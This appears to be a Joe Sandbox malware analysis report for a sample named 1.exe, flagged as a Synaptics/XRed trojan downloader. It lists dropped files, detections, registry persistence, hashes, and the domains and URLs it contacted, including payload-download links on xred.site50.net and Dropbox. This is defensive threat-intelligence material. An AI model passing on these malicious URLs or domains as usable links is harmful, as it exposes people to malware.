                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585287 Sample: 1.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 33 freedns.afraid.org 2->33 35 xred.mooo.com 2->35 37 4 other IPs or domains 2->37 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Antivirus detection for URL or domain 2->57 61 14 other signatures 2->61 8 1.exe 1 6 2->8         started        12 EXCEL.EXE 224 56 2->12         started        signatures3 59 Uses dynamic DNS services 33->59 process4 file5 23 C:\Users\user\Desktop\._cache_1.exe, PE32 8->23 dropped 25 C:\ProgramData\Synaptics\Synaptics.exe, PE32 8->25 dropped 27 C:\ProgramData\Synaptics\RCX9CB3.tmp, PE32 8->27 dropped 29 C:\...\Synaptics.exe:Zone.Identifier, ASCII 8->29 dropped 63 LummaC encrypted strings found 8->63 14 Synaptics.exe 39 8->14         started        19 ._cache_1.exe 8->19         started        signatures6 process7 dnsIp8 39 docs.google.com 142.250.185.110, 443, 49744, 49745 GOOGLEUS United States 14->39 41 drive.usercontent.google.com 142.250.186.161, 443, 49755, 49756 GOOGLEUS United States 14->41 43 freedns.afraid.org 69.42.215.252, 49753, 80 AWKNET-LLCUS United States 14->43 31 C:\Users\user\Documents\~$cache1, PE32 14->31 dropped 45 Antivirus detection for dropped file 14->45 47 Multi AV Scanner detection for dropped file 14->47 49 Drops PE files to the document folder of the user 14->49 21 WerFault.exe 23 16 14->21         started        51 Machine Learning detection for dropped file 19->51 file9 signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              1.exe85%VirustotalBrowse
                              1.exe87%ReversingLabsWin32.Trojan.Synaptics
                              1.exe100%AviraTR/Dldr.Agent.SH
                              1.exe100%AviraW2000M/Dldr.Agent.17651006
                              1.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\RCX9CB3.tmp100%AviraTR/Dldr.Agent.SH
                              C:\ProgramData\Synaptics\RCX9CB3.tmp100%AviraW2000M/Dldr.Agent.17651006
                              C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                              C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                              C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\RCX9CB3.tmp100%Joe Sandbox ML
                              C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                              C:\Users\user\Desktop\._cache_1.exe100%Joe Sandbox ML
                              C:\ProgramData\Synaptics\Synaptics.exe87%ReversingLabsWin32.Trojan.Synaptics

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              twistforcepo.cfd0%Avira URL Cloudsafe
                              https://docs.goow0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SUpdate.iniH)100%Avira URL Cloudmalware
                              https://docs.goo0%Avira URL Cloudsafe
                              http://xred.site50.net/syn/SSLLibrary.dlp100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              freedns.afraid.org
                              		69.42.215.252
                              		truefalse
                                		high
                                docs.google.com
                                		142.250.185.110
                                		truefalse
                                  		high
                                  s-part-0017.t-0009.t-msedge.net
                                  		13.107.246.45
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		142.250.186.161
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        twistforcepo.cfdtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        xred.mooo.comfalse
                                          		high
                                          rabidcowse.shopfalse
                                            		high
                                            wholersorie.shopfalse
                                              		high
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                		high
                                                cloudewahsj.shopfalse
                                                  		high
                                                  noisycuttej.shopfalse
                                                    		high
                                                    nearycrepso.shopfalse
                                                      		high
                                                      framekgirus.shopfalse
                                                        		high
                                                        tirepublicerj.shopfalse
                                                          		high
                                                          abruptyopsn.shopfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1~$cache1.3.drfalse
                                                                		high
                                                                https://docs.google.com/8Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.goowSynaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005492000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://docs.google.com/1Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.microsoft.coSynaptics.exe, 00000003.00000002.1579357686.00000000078E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://docs.google.com/ire-trusted-types-forSynaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://upx.sf.netAmcache.hve.14.drfalse
                                                                              		high
                                                                              http://xred.site50.net/syn/Synaptics.rar~$cache1.3.drfalse
                                                                                		high
                                                                                https://docs.google.com/Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1579357686.00000000078D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/google.com/Synaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.google.com/esMonSynaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1~$cache1.3.drfalse
                                                                                            		high
                                                                                            https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1~$cache1.3.drfalse
                                                                                              		high
                                                                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978=Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=81.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://xred.site50.net/syn/SUpdate.ini~$cache1.3.drfalse
                                                                                                      		high
                                                                                                      https://docs.gooSynaptics.exe, 00000003.00000002.1578664334.00000000077F5000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://xred.site50.net/syn/SSLLibrary.dlp1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://drive.usercontent.google.comSynaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1575813367.0000000004D5E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://docs.google.com/google.com/aSynaptics.exe, 00000003.00000003.1435345190.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://xred.site50.net/syn/SUpdate.iniH)1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              http://xred.site50.net/syn/SSLLibrary.dll~$cache1.3.drfalse
                                                                                                                		high
                                                                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629783Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    142.250.186.161
                                                                                                                    		drive.usercontent.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    142.250.185.110
                                                                                                                    		docs.google.comUnited States
                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                    69.42.215.252
                                                                                                                    		freedns.afraid.orgUnited States
                                                                                                                    		17048AWKNET-LLCUSfalse

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1585287
                                                                                                                    Start date and time:2025-01-07 13:17:18 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 6m 19s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Sample name:1.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.expl.evad.winEXE@7/28@6/3
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 94%
                                                                                                                    • Number of executed functions: 7
                                                                                                                    • Number of non-executed functions: 121
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 23.56.254.164, 20.189.173.8, 20.42.65.92, 13.107.246.45, 40.126.32.76, 20.12.23.50
                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, onedscolprdwus07.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    07:18:26API Interceptor115x Sleep call for process: Synaptics.exe modified
                                                                                                                    07:18:45API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                    13:18:22AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    69.42.215.252file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    s-part-0017.t-0009.t-msedge.net64pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    mail-41.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    iy1.dat.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e199876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):118
                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_348ac1a0e27e10257094c0b0d8fb7ab45be575f_455b7b6e_cc67f19a-ef6b-45cb-8e05-6f572bf8087e\Report.wer

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133326375425338
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:fmBVps3Imo0WMn4DzJDzqjLOA/FczxwzuiFc/Z24IO8EKDzy:My35WMn4JqjkKzuiFc/Y4IO8zy
                                                                                                                    MD5:FB203EC6304224ED55D9CF99C716CB2C
                                                                                                                    SHA1:F0DA6B7AAA5476951D92441FC6B33790013BA9BA
                                                                                                                    SHA-256:9840CCC5462DB65AB0CF41ED3A89B00958D3AF04000518ECDD0CD109E47749DC
                                                                                                                    SHA-512:69B4B0536201FFB0670EFA66EF98E62B6F7BE2CAE1C0314655C88A27D42CD38882B8A6DF1BD6B1F5EEA50386E1D4EDD99DDF0A5B23786BDC4821CA7924E2A970
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.2.5.9.2.0.0.1.3.0.3.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.2.5.9.2.3.4.9.7.4.0.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.6.7.f.1.9.a.-.e.f.6.b.-.4.5.c.b.-.8.e.0.5.-.6.f.5.7.2.b.f.8.0.8.7.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.d.1.7.b.f.c.-.f.d.1.6.-.4.7.f.0.-.b.7.0.c.-.1.3.1.a.d.d.a.a.c.4.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.4.-.0.0.0.1.-.0.0.1.3.-.c.8.e.c.-.1.c.3.d.f.e.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.1.b.9.3.e.9.8.5.b.c.3.0.0.0.b.a.c.7.7.1.1.2.6.9.7.f.6.7.0.2.b.2.e.b.5.2.c.c.3.7.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB9E.tmp.dmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Tue Jan 7 12:18:40 2025, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2139536
                                                                                                                    Entropy (8bit):1.8205505237118613
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:qWQzOICwegAKSLywJRjmx9mYFvi6wpqYKLPFqwL5Me4DfLRPWf0BuAQpQQh:qWQrCvbDRjd4kqYcpABw0BmLh
                                                                                                                    MD5:EDDAEF1468D1980FE079705DAC29D66F
                                                                                                                    SHA1:8CC0E10F102B5B0E82281F3049C4054006AC35FB
                                                                                                                    SHA-256:073797EF1786BA6FD13BCDA9C2C1C5C15E4D47A772A022CD1EFB6835B2E8DE62
